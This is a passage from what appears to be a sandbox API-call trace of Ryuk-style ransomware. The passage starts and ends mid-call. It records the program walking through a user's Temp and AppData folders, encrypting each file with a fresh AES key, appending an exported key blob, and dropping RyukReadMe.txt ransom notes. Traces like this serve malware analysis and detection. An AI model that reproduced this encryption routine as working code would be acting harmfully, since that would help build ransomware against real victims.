(hObject=0x190) returned 1 [0143.946] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.946] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.946] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\wv4USO13cBuDtshUgva.rtf", dwFileAttributes=0x80) returned 1 [0143.946] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\wv4USO13cBuDtshUgva.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\wv4uso13cbudtshugva.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.946] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=45604) returned 1 [0143.946] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=45604) returned 1 [0143.946] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xb102, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.946] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.947] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.947] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.947] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.947] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.947] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xb224, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xb224, lpOverlapped=0x0) returned 1 [0143.948] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.948] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xb224, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xb230) returned 1 [0143.948] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.948] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xb230, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xb230, lpOverlapped=0x0) returned 1 [0143.948] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.948] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.949] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.949] CloseHandle (hObject=0x190) returned 1 [0143.965] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.969] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.969] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.969] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.969] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.969] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XYjsMCuBEgkqyvVcx8.gif", dwFileAttributes=0x80) returned 1 [0143.969] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\XYjsMCuBEgkqyvVcx8.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\xyjsmcubegkqyvvcx8.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.969] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=98355) returned 1 [0143.970] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=98355) returned 1 [0143.970] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x17f11, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.970] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.970] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.970] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.970] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.970] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.970] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18033, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x18033, lpOverlapped=0x0) returned 1 [0143.972] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.972] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x18033, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x18040) returned 1 [0143.972] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.972] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18040, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x18040, lpOverlapped=0x0) returned 1 [0143.973] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.973] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.973] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.973] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.973] CloseHandle (hObject=0x190) returned 1 [0143.998] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.002] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.002] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.002] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.002] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.002] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZCCXB59gEr7eihfz.png", dwFileAttributes=0x80) returned 1 [0144.002] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\ZCCXB59gEr7eihfz.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\zccxb59ger7eihfz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.003] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=26635) returned 1 [0144.003] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=26635) returned 1 [0144.003] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x66e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0144.003] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0144.003] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.003] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0144.003] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0144.003] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.003] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x680b, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x680b, lpOverlapped=0x0) returned 1 [0144.004] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0144.004] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x680b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x6810) returned 1 [0144.004] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0144.004] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x6810, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x6810, lpOverlapped=0x0) returned 1 [0144.004] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0144.004] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0144.004] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0144.004] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0144.005] CloseHandle (hObject=0x190) returned 1 [0144.020] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.024] CryptDestroyKey (hKey=0x3b8690) returned 1 [0144.024] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.024] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.024] SetLastError (dwErrCode=0x0) [0144.024] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.025] GetLastError () returned 0xb7 [0144.025] CloseHandle (hObject=0x190) returned 1 [0144.025] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0144.025] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.025] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.025] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0144.025] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0144.025] SetLastError (dwErrCode=0x0) [0144.025] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\~nsu.tmp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\~nsu.tmp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.026] GetLastError () returned 0x0 [0144.026] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0144.027] CloseHandle (hObject=0x190) returned 1 [0144.027] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0144.027] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0144.027] SetLastError (dwErrCode=0x0) [0144.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.027] GetLastError () returned 0xb7 [0144.027] CloseHandle (hObject=0x18c) returned 1 [0144.027] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0144.027] SetLastError (dwErrCode=0x0) [0144.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.027] GetLastError () returned 0xb7 [0144.027] CloseHandle (hObject=0x18c) returned 1 [0144.027] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0xffffffffffffffff [0144.027] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0144.027] SetLastError (dwErrCode=0x0) [0144.027] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temporary Internet Files\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temporary internet files\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.028] GetLastError () returned 0x0 [0144.028] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0144.029] CloseHandle (hObject=0x18c) returned 1 [0144.029] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0144.029] SetLastError (dwErrCode=0x0) [0144.029] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.029] GetLastError () returned 0xb7 [0144.029] CloseHandle (hObject=0x18c) returned 1 [0144.029] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0144.030] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.030] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0144.030] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0144.030] SetLastError (dwErrCode=0x0) [0144.030] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\VirtualStore\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\virtualstore\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.030] GetLastError () returned 0x0 [0144.030] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0144.031] CloseHandle (hObject=0x18c) returned 1 [0144.031] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0144.031] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0144.031] SetLastError (dwErrCode=0x0) [0144.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0144.031] GetLastError () returned 0xb7 [0144.031] CloseHandle (hObject=0x188) returned 1 [0144.031] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0144.031] SetLastError (dwErrCode=0x0) [0144.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0144.031] GetLastError () returned 0xb7 [0144.031] CloseHandle (hObject=0x188) returned 1 [0144.031] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0144.032] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0144.032] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0144.032] SetLastError (dwErrCode=0x0) [0144.032] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0144.032] GetLastError () returned 0x0 [0144.032] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0144.033] CloseHandle (hObject=0x18c) returned 1 [0144.033] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0144.034] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.034] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0144.034] SetLastError (dwErrCode=0x0) [0144.034] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0144.034] GetLastError () returned 0x0 [0144.034] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0144.035] CloseHandle (hObject=0x190) returned 1 [0144.035] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0144.035] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.035] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0144.035] SetLastError (dwErrCode=0x0) [0144.035] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0144.036] GetLastError () returned 0x0 [0144.036] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0144.036] CloseHandle (hObject=0x194) returned 1 [0144.036] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0144.038] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.038] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0144.038] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0144.038] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip", dwFileAttributes=0x80) returned 1 [0144.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0144.039] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab128 | out: lpFileSize=0x29ab128*=42495) returned 1 [0144.039] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x29ab138 | out: 